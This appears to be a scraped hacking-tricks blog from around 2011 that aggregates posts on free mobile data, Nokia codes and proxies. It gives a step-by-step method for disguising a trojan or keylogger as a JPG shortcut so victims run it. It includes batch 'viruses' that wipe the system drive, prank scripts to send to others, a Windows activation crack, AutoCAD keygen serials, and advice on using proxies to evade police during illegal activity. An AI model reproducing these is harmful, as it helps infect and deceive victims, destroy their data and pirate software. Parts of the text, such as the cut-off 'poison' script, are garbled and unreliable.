recipient can read it. It connects easily to your previously installed email or Web mail.

Written for those who occasionally, but not always, want or need to exchange encrypted

emails, for those with no or only little knowledge of encryption, and for those who want

to give encryption a try.

Distinguishing Features
Ease of Use:
1. Fast to Install: Download, doubleclick on the installer, and you are set to go.
2. Works with your existing e-mail program and your web mail: No change of e-mail

programs or fiddling with e-mail program reqired.
3. Keeps the knowledge needed to work public key encryption to a minimum.

PGP Standard:1. The program uses public key cryptography in the way specified by the

PGP standard.
2. Thus, this program is able to (or at least should be able to) exchange messages with all

programs that use the PGP standard, e.g., PGP itself or any GPG-powered open source

program.

Security:1. The used encryption Algorithm are considered to be secure, i.e., a text or file

this encrypted cannot be read by someone who does not have access to the key for which

it was encrypted.
2. This includes, to the best knowledge of the author of this program, private or

government agencies that have access to the currently available most sophisticated

methods.
3. However, the author does not accept legal liability for this statement, as in this field

one can never be sure, one can just try one's best.

Home Page - http://www.instantcrypt.com/
Download:
http://hotfile.com/dl/82526590/6b15947/InstantCrypt_2.3_Portable.rar.html
http://www.filesonic.com/file/31979775/InstantCrypt_2.3_Portable.rar

Hide EXE File Into JPG


[trick]Hide EXE File Into JPG
This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your slave using this trick..?

1) Firstly, create a new folder and make sure that the options 'show hidden files and

folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on

your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe'

(that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example

'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to

jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server

renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first

file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the

other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change

the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s

better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and

to get connected to someone they must click on the shortcut created not on the first file.

So rename the files to whatever you want considering the person and the knowledge they

have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to

be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server

'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the

hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or

Rar.

17) Inside the Rar or Zip file you can see the files properties and even after all this work

you can see that the shortcut is recognized like a shortcut but hopefully the person you

sent this too doesn’t know that and is going to open it.
Black Hat Victoire

Windows 7 Genuine Activation


[share]Loader Windows 7 Genuine Activation
How to make your Windows 7 Genuine. This is 100% working hack which will activate

your windows for forever and you can even download all updates and future releases by

Microsoft. The tool Windows 7 Genuine Activation Patch works in two steps i.e. in first

step we will activate the windows and make it genuine and in next step we will remove

the WAT file so that we can easily download all the updates without any warning

messages

How to Use this Windows 7 Loader?

PROCESS 1:
1. Run The "7Loader Release 5.exe" file Click Select Task.
2. Here You Can Either Choose To Let Your PC Have The Name Of A Brand.
3. Select The "Please Select" Dropdown Windows and Choose Any Brand Name That You

Want Your Computer To Show.. Example : Acer, Dell, alienware Biostar ECT.
4. Then Click "Activate slic Present" And Wait (Be Patient While It Works) Then another

Window Will Pop Up .. Just Choose anything.
5. Afterward Click "Install information 32bit" Or "Install information 64Bit" Depending On

Your Operating System.
6. Now Hit The "Hazar Option 2" Button ... Wait Till Finished Then restart Your Pc.
7. For Those Who Just Want a Straight Forward Activation Just Run "None slic Option 1"

Followed By "Hazar Option 2" Then Reboot.
8. After Doing This Upon Reboot.. Go To "My Computer" Properties You Will Then See

Windows Is Activated...........Or Just Run The Loader And Choose Status.


PROCESS 2:
Run The "RemoveWAT.exe" file And Choose Remove Wat...... Wait Let It Work,,, When

Completed All Is Well.....

http://www. mediafire. com/?19p8nkj8b1ny9zz

Recover windows xp after virus attack


Recover windows xp after virus attack

Hello guys , as we all know nowadays virus attacks are very common and we have to have

lot of problems because of viruses like task manager does not opens,folder options

missing, registry has been disabled by administrator,cannot find dll and so on. These are

very common problems and can happen with any of us so we must know to fix these

problems without formatting your windows XP. Most of the virus infects your basic

programs i.e task manager,registry,group policy editor,boot up,folder properties etc.

Today i will tell how to Fix windows Xp after virus attack in this article. So guys read on...

here are several free tool in the market that can help you to fix your windows xp after

virus attacks but i always come with complete package. Don't worry friends its also a free

tool but using this you can recover almost every windows services and functionality

within few seconds and that's also without formatting. Why i am telling all this is because

we must know how to recover along with how to hack and hacking...

The features of the tool that i have discussed above is called QUICK FIX.
Quick fix is really an outstanding tool. Its an complete solution of a to z windows XP

problems. You can recover back from all types of virus attacks using this tool.

Below are some Important Features:
1. Enable Task Manager
2. Enable Registry
3. Enable Folder Options
4. Restore missing run dialog
5. Enable Command Prompt(cmd)
6. Stop My Documents to open at start up
7. Restore Device manager.
8. Fix Delay at start up.
9 Fix Recovery Console
and much more....

So Guys why are you waiting Download Quick Fix and Fix your windows problems wasily

in a single click..

http://www.mediafire.com/?bcmd3rdtu92pa4t

BSNL FREE 3G AGAIN FREE

[Trick] ~ BSNL FREE 3G AGAIN FREE ~
free BSNL 3g trick for pc for south india user...

Please read the whole post...

This trick is working perfactely in Karnataka, try in your state...

Here is the trick..

Step 1 connect mobile to pc. And set accesspoint settings to BSNLNET.

step 2. Open default brwsr in mobile and select the apn which not open any site 

bsnlinternet for karnataka, bsnlmms 4 kerala, bsnlsteam 4 ap.
Minimize it

step 3. Then open any other browser in mobile and conect it wt apn which gv tempory 

prblm eror msg ie. Bsnlwap 4 karnataka, bsnlportal 4 kerala, and bsnlwap for ap. This 

apn not conect the site and U get a msg that u used okb.

Step 4. Now then conect in the pc via pc suite with apn bsnlnet for all states. U get a msg 

that u usd 0kb. After that msg all is free

Note :
- Never disconnect access point BSNL INTERNET, BSNL MMS or BSNL STREAM.
- At the time of disconnecting first disconect BSNL NET and after that disconnect BSNL 

INTERNET, BSNL MMS or BSNL STREAM.
- Only 0.01 Rs. will be charged at the time of disconnecting...
- In the inbuilt web browser 'web connection time out' pop up will come but don't worry 

about that.

Balance condition : should not be 0 Rs..

Enjoy...


credit - parth 


am not frm south but its wrk and also work in my up east 

my frnd 1st connect with bsnlwap in default browser in mobile then nothing open then 

via uc web ya opera mini in mobile open via bsnlmms

and net gona connected and run free !

Note : try on low balance dnt balme if u do wrong and not wrk for u

enjoy again free bsnl 3g !

Sunday, August 14, 2011

Clean your RAM by notepad

[TRICK]Clean your RAM by notepad
Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot 

with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any 

more. 

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u 

save it ] 

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".


FreeMem=Space(1280000000)

It Will Make Speed Your System..

Aap Logon Ko Apna Samajhke Share Kiya..
Baki Accha Na Lage To Delete This Thread...
Aur Mazak Banana Hai To Bana Lo..

Saturday, August 13, 2011

mobile security code


*3370#
This Nokia code activates Enhanced Full Rate Codec (EFR) – Your Nokia cell phone uses the best sound quality but talk time is reduced my approx. 5%#3370#
Deactivate Enhanced Full Rate Codec (EFR)*#4720#
Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

*#4720#
With this Nokia code you can deactivate the Half Rate Codec

*#0000#
Displays your phones software version, 1st Line : Software Version, 2nd Line : Software Release Date, 3rd Line : Compression Type

*#9999#
Phones software version if *#0000# does not work

*#06#
For checking the International Mobile Equipment Identity (IMEI Number)

#pw+1234567890+1#
Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+2#
Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+3#
Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

#pw+1234567890+4#
SIM Card Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols)

*#147#
This lets you know who called you last (Only vodofone)

*#1471#
Last call (Only vodofone)

*#21#
This phone code allows you to check the number that “All Calls” are diverted to

*#2640#
Displays phone security code in use

*#30#
Lets you see the private number

*#43#
Allows you to check the “Call Waiting” status of your cell phone.

*#61#
Allows you to check the number that “On No Reply” calls are diverted to

*#62#
Allows you to check the number that “Divert If Unreachable (no service)” calls are diverted to

*#67#
Allows you to check the number that “On Busy Calls” are diverted to

*#67705646#
Phone code that removes operator logo on 3310 & 3330

*#73#
Reset phone timers and game scores

*#746025625#
Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible

*#7760#
Manufactures code

*#7780#
Restore factory settings

*#8110#
Software version for the nokia 8110

*#92702689#
Displays – 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again

*#94870345123456789#
Deactivate the PWM-Mem

**21*number#
Turn on “All Calls” diverting to the phone number entered

**61*number#
Turn on “No Reply” diverting to the phone number entered

**67*number#
Turn on “On Busy” diverting to the phone number entered

12345
This is the default security code

poison batch file


Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

Code:
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.

Hack your friend's keyboard


Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it.

Gprs Settings


Note: Still your purpose is not solved and you are not able to configure gprs on your mobile phone for free so you can still manually configure free gprs on your mobile device by manual gprs settings given below for almost every subscriber and their service and if i have missed any one of them do let me know.

Manual Hutch Gprs Settings

   1. Account Name – Hutch_GPRS
   2. User Name – Blank
   3. Password – Blank
   4. Proxy – Enabled/yes
   5. Access Point Name – portalnmms
   6. Full Internet Access Point Name – www
   7. Proxy and Server address – 10.10.1.100
   8. Proxy and Server Port – 8080
   9. Homepage – http://hutchworld.co.in
  10. Authentication Type – Normal

Manual Airtel Gprs Settings

   1. Homepage – any page you want to set.
   2. User Name – Blank
   3. Password – Blank
   4. Proxy – Enabled/yes.
   5. Proxy and Server Adress – 202.56.231.117
   6. Proxy and Server Port – 8080
   7. Data bearer – GPRS or Packet Data.
   8. Access Point Name – airtelgprs.com
   9. Authentication Type – Normal
  10. Use preferred access point – No

Manual Airtel live settings

   1. Account Name – Airtel_live
   2. Homepage – http://live.airtelworld.com
   3. Username – Blank
   4. Password – Blank
   5. Proxy – Enabled/yes
   6. Proxy and Server Adress – 100.1.200.99
   7. Accespoint Name – airtelfun.com
   8. Proxy and Server Port – 8080
   9. Data bearer – GPRS/ Packet Data
  10. Authentication Type – Normal

Manual Idea Gprs Settings

   1. Account Name – idea_GPRS
   2. Username – Blank
   3. Password – Blank
   4. Homepage – http://wap.ideafresh.com
   5. Proxy and Server Port – 8080
   6. Proxy and Server adress – 10.4.42.45
   7. Databearer – GPRS / Packetdata
   8. Acces Point Name – imis
   9. Proxy – Enabled/yes
  10. Authentication Type – Normal

Manual Bsnl Gprs Settings

   1. Account Name – BPL WAP
   2. Username – <Blank>
   3. Password – <Blank>
   4. Proxy – Enabled/yes
   5. Homepage – http://wap.mizone.bplmobile.com
   6. Proxy and Server address – 10.0.0.10
   7. Proxy and Server Port – 8080
   8. Acces Point Name – mizone
   9. Data bearer – GPRS/ Packetdata
  10. Authentication Type – Normal

Manual aircel Gprs Settings
here is the free gprs trick which helps you to browse free from your aircel mobile phone
just type “GPRS BP NOK N73? AND SEND TO 57788
and after you receive confirmation sms
type “YES BP” and send to 57788

Aircel users now make free internet settings for browsing aircel pocket internet freely,china mobiles can acccess free configuration settings for aircel pocket internet,new 2010 pocket internet trick in aircel
use below settings for free browsing in aircel mobiles
1. Access point : aircelwap.pr
2.PROXY address :192.168.35.201
3.PORT no – 8081
4.HOME PAGE – http://funstuffz.com
For aircel pocket internet settings send SMS PI- send121
Receiving setings problem for china mobiles,hack aircel internet for free unlimited usage tricks
latest aircel mobile pocket internet setting make sure the u Ec with Rs.14 for 3days pack and Rs.98 For 1month pack for access uninterrupted pocket internet

Autodesk AutoCAD 2011 Keygens Only (32 & 64bit)


 Autodesk AutoCAD 2011 Keygens Only (32 & 64bit)
Directions:
1.  Download and install Free trial. DISCONECT INTERNET AFTER DOWNLOAD IS COMPLETE!

2.  When asked to insert something, insert this:

400-45454545   OR   667-98989898   OR   666-69696969

then

128B1   OR   001C1

3.  Click Next. (some message saying that the code may be right or not. Ignore this shit.)
4.  Click OK or exit.
5.  Click Next again.
6.  Install product. Don't forget to configure what you want in AutoCAD!!!
7.  Finish installation and exit. (Restart Computer after installation complete.)
8.  Start AutoCAD.
9.  Choose the Activate option.
10. Run As Administrator the "xf-A2011-32bits" or "xf-A2011-64bits."
11. Click Mem Patch. "Succeed" should appear and hit ok.
12. Copy the request code from AutoCAD into the Keygen.
13. Press Generate.
14. Copy Keygen activation code thing that is generated.
15. In AutoCAD, select Activate now or Insert Serial or something like that.
16. Paste Activation Code.
17. Click Next.

You now have full version of Autodesk AutoCAD and it is registered.

*Reconnect internet.

Original Uploader-JugzG0nn4G3tY4.




http://gnrsu.com/autocad-2011-keygen.html
http://www.fileserve.com/file/jxmxHcy
http://www.filestube.com/19f31f166b3b2f2e03ea/go.html

Free Balance Transfer Trick


>>> Idea Free Balance Transfer Trick
 * Idea Users In All India Transfer Their Balance Send This Sms ,
 * This is A toll Free Msg.Ex. GIVE 988888888
 * send to 55567
 * You are send max 100 rs.
> *567*90936474848*100#(i.e: *567*mobile no*amount to transfer#)

>>> Tata Docomo Free Balance Transfer Trick
 * Type “BT MobileNumber amount” and send it to 54321.
 * for example BT 6098123490 50
 * That’s it your done if you do the above procedure very carefully.

>>> Vodafone Free Balance Transfer Trick
 * Make Sure you enter the Valid 10 digit Mobile Number of your Friend (Cross Check Twice)
 * Enter any Amount between from 5Rs(lower limit) and 30Rs (upper limit)
 * You are allowed to transfer money to the same number only once in a day.
 * Play safe with *131*Amount*FriendMobileNumber# , Your crazy  Friend could grab your Phone and send all your money to his Number
 > This balance transfer activation is very simple you can just send a sms to  transfer balance just type TRANS  rupees mobile number  and send it to 144.

 for ex:”TRANS 25 9019156734" send to 144.

 note: only rs25 can be transferred.

>>> Airtel Free Balance Transfer Trick
 * this is the free balance trick used in airtel
 use this technique and transfer  balance from one mobile to another mobile
 dial *141*mobile no.# in your mobile which helps to transfer balance

>>> BSNL Free Balance Transfer Trick
* To transfer balnce in your bsnl prepaid mobile is very easy to
  transfer your balance to your friends follow these steps and you will succeed.
* Balance Transfer Trick for BSNL Prepaid-
* sms as  GIFT (Bsnl no.) (amount) to 53733 or 53738
* Ex: GIFT 9443613692 50

tested in west bengal and it works in other states.

Convey your friend a little message and shut down his / her computer:


Convey your friend a little message and shut down his / her computer:
Type :

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
Save it as "Anything.BAT" in All Files and send it.

Continually pop out your friend's CD Drive


Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.

3 SIMPLE VIRUSES


[TRICK] 3 SIMPLE VIRUSES
1.This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat

2.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* y

Save It As Anything.bat

3.The below Code Will Just Restart Ur PC

@echo off shutdown -r -f -t 00

save as anyname.bat

Wednesday, August 10, 2011

Chapter 8 : Changing the ip address and bypassing the firewall


Chapter 8 : Changing the ip address and bypassing the firewall



Proxy is changing ur ip adress.dis chapter is totally related 2 changing ur ip address,changing ip address is very much imp. bcoz by doing it, we get many benefits.
[1st]we can download multiple files 4m rapidshare
[2]by dis we can bypass a firewall
[3] der r many sites vch allows only one account on 1 ip address,on dose sites we can make multiple ids by dis.
[4]4 being safe while doing cyber hackes,it is very much essential 2 do proxy.
[5]after of doing proxy,we can fool other person very easily.
learning proxy is very imp. bcoz while doing cyber hacks it makes u some safe .
let's start /

see,suppose dt u vant 2 propose a girl nd u r very much scared about her reaction then u simpally say ur any freind 2 tell her dt u like her,this is proxy,actually this is nt proxy bt it giveS a solid idea of proxy.
wenever u send some data 2 any web server then dt server watch ur ip adress,in proxy ,first we connect 2 any proxy server,nd now we do surfing,now supose dt u r sending some data 2 any server ,nw bcoz u hv done proxy ,ur data vl be sent via dt proxy server nd dt server where u r sending d data,dt server ud nt be able nw 2 trace u bcoz now dt server can watch dt proxy server ip.

emme tel u something about working of proxy.
U------>SENDING DATA 2 GMAIL------->GMAIL REPLYING 2 U
AFTER OF DOING PROXY THIS THING LOOKS SOMETHING LIKE DIS
U---->PROXY SERVER--->GMAIL SERVER------>PROXY SRVER-->U

NW i think u hv got d idea of proxy,if still nt got then write in help desk,i vl clear u more.
after of doing proxy we found 1 thing dt our internet speed has gone very slow.itgoes 2 70%
nw a small real hacking story.
b4 of some months a 16 year old boy in u.s.a. did dos attack on nasa website.on dt moment nasa had sent his robote 2 mangal planet[sorry,i donno english of mangal planet anyway],d moment on vch he did dos attack on dt moment d robot of nasa ws steping on mangal planet,after dos attack dt robot just stopped nd just went 2 hang.robot stopped working.
nw all de nasa scientists started looking at each other face like a stupid,de were nt getting vat is dis going on?

nw de sTarted 2 search who has done it?nd after of 14 day they got d location of d boy nd went 2 his home nd caught.
nw d question rises up,y i hv written dis story here.?
actualy d boy has chnaged his ip address 4 times. i mean first he chaNged his ip address,then he did another proxy over of d first proxy then d 3rd then 4th the 5th,he did nt chANge his mac address.
all i want 2 tell u ,if u hv done proxy then the webmaster cann't trace u vdout going 2 d proxy server 2 vch u hv connected nd if u hv done proxy flooding 4 10times then be 100% assured no1is coming 2 catch u b4 of 1 month.if u hv done proxy 4 10 times then 4 tracing d fbi vl first go 2 d 10th proxy server 2 vch u hv connected thenwards 4m der he vl get 2 knw ur 9th server then wards they vl go 2 d 9th server then 2 8th nd thus continue.nd finaly in coming 2 u they vl take 1 month.itis nt possible 4 dem 2 trace u4m comuter.they must go personally 2 d proxy server nd all dis takes time.
i think u ppl got d importaince Of doing proxy.
anyway .let' mooov 2 learn hw 2 do proxy.let's start.

First of al write in google"list of proxy address" or u may search 4 "free proxy server"
nw many links will come.go on any1 of them.
now on that website u vl find many ip address nd port no.s.
these r d adress of proxy servers.now copy any1 of de address.mind it,u hv 2 copy both d things,i mean port no. as well as ip address.
now open ur internet explorer nd go in
tools>internet option>connection>lan setting
go in lan setting,der u vl see 2 blue lines.one is AUTOMATIC CONFIGURATION ND d second one is PROXY SERVER
in proxy server named tab u vl see 4 blocks.2 for ticking nd 2 for giving address.tick both of dem boxes nd in address put d ip adress u copied nd in port no. put d port no. u copied.never forget 2 tick both d boxes .now click o.k.
nw open whatismyip.com
nd u vl see dt ur ip address has been chANged.
in mozilla firefox go here
tools>options>advanced>network>settings
nd in settings put d ip address nd port no.
dis is d same operation vch is carried out in all type of browser.
der r many softwares 4 dis purpose.all of dem r shit nd nothing else.
der is anonyomous proxy list verifier named software nd many more ,all of dem do d same work.i don think any1 should use dem.
u can do d above said work in a more simple way also.
simpally open http://www.proxy4free.com/named site.
der in most left side u vl see written "proxy list"
in proxy list der vl be many lists named list 1list 2 list 3 nd many more .simpally go on list 1 nd copy ip nd port no.l 4m der.
confused

come 2 d point vch u did nt get in my previous proxy named thread.
see,doing proxy makes u more safe while doing illlegal stuffs but d problem is how 2 do proxy flooding.
proxy flooding means connectiong 2 a proxy server then again connection 2 any other proxy server then again 2 ay other server.
if u vl do proxy flooding then u vl be very much safe /
i m telling u some software's name here 4m vchg u can do proxy flooding very easily but mind it i m nt going 2 give u all de software.some of dem i vl give u nd some of dem u hv 2 search on ur own bt d one vch i vl giv u ,vl be enough 2 do proxy flooding ..anyway.
name of tools 4 doing proxy floding-->
SocksChain,happy browser tool,multiproxy,tor
these are d tools 4 doing proxy flooding,wen u r doing something highly illegal then first of all use any1 of dese softwares nd nw do vatever u vanna do .now u r very much safe/
tool "multiproxy"is a very very very good tool.itensures u police vl nt come 2 u b4 of 1 month nd tor is also very very good./
get tor 4m here.
tor.eff.com
now some extra outstanding good stuffs lolz.
use a software named "brozar".it does nt leave any log wen u do illegal stuffs .a very god software 2 make u safe ,searching it is ur duty.
use a software named "torpark browser"it also do d same work of brozar.if u r using it then it makes u sure dt der is no log u r leaving on d internet.this is a perfect tool 2 make u very very much safe.download it 4m here.
torrify.com/index.php
i know i hv told here name of many tools but all u need 2 download onlu tor nd torpark browser.
4get all d other tools name.i hv given here links also ..simpally download nd be safe ...
freinds

doing proxy helps u in many ways.
on rapidshare u can't download more than 1 file on 1 time bt vd doing proxy u can download multiple files.
all d sites vch does nt offer u 2 make more than 1 account on ur computer vl allow u 2 make many1 after doing proxy,in colleges where orkut or other sites r blocked ,u can open all d restricted sites vd doing proxy .
well, if u r trying 2 bypass d firewalll of ur coolege nd u r using proxy then it makes ur internet speed very much slow.indt case use a software named "ultra surf"
u can get ultrasurf very easily on internet .simpally write in gogle"download ultra surf"nd u vl get it.after of downloading it ,alll u hv 2 do is 2 a double click on it,a lock sign vl apear nd now no firewall can stop u by doing browsing.inmany colleges they motherfucker bind d word proxy even nd der by doing proxy u cann't surf d way bt ultra surf is 100% unstopable4m al d firewalls nd it also gives u a very goodbrosing speed there4 bettter in college use ultra surf.

http://www.hidemyass.com/http://www.anonymizer.com/http://www.wujie.net/http://www.ultrareach.net/http://surfshield.net/

those are some of proxy sites tht will provide u with access to blocked websites

Summary of d chapter.
=================

[1]proxy is done 4 being safe while doing illegal stuffs nd 4 bypassing firewalls.itis a very good option 2 download multiple files 4m rapidshare at any single moment.
[2]get proxy server lists nd apply these address in ur browser 2 surf d web anonymously.
[3]use software "tor" 2 do proxy flooding

Proxy server are of four types:
=======================

1. Transparent Proxy
================
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.)

2. Anonymous Proxy
===============
This type of proxy server indentifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users.

3. Distorting Proxy
==============
This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers.

4. High Anonymity Proxy
===================
This type of proxy server does not identify itself as a proxy server and does not make available the original

INSTRUCTIONS FOR CHANGING UR IP ADDRESS IN DIFFERENT EXPLORER :

Instructions for Internet Explorer 6.0
===========================

1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.



Instructions for FireFox
==================

1. Select the Tools Menu
2. Select Options
3. Select Connection Settings
4. Select Manual Proxy Configuration
5. Check Use the same proxy for all protocols
6. Enter the IP address for the HTTP proxy server
7. Enter the port of the HTTP proxy server
8. Click Okay

Instructions for Netscape 7.1
=====================

1. Select the Edit Menu
2. Select Preferences
3. Maximize Advanced
4. Select Proxies
5. Choose Manual proxy configuration
6. Enter the proxy server's IP address in the HTTP Proxy field and the proxy's port into the corresponding Port field.
7. OK your way out

Opera 8.5
========

1. Select the Tools Menu
2. Select Preferences
3. Select Advanced Tab
4. Select Proxy Servers
5. Check the box next to HTTP
6. Enter the proxy server's IP address in the first box and the proxy's port in the box after "Port"
7. OK your way out

Safari 2.0.3
=========

1. Select Preferences
2. Select Advanced
3. Select Proxies: Change Settings
4. Check the box next to Web Proxy (HTTP)
5. Enter the proxy server's IP address in the first box and the proxy's port in the box after the ":"
6. Select Apply Now


Hope u like it
===========
Comments are welcome
==================


Source is here ---- > Click here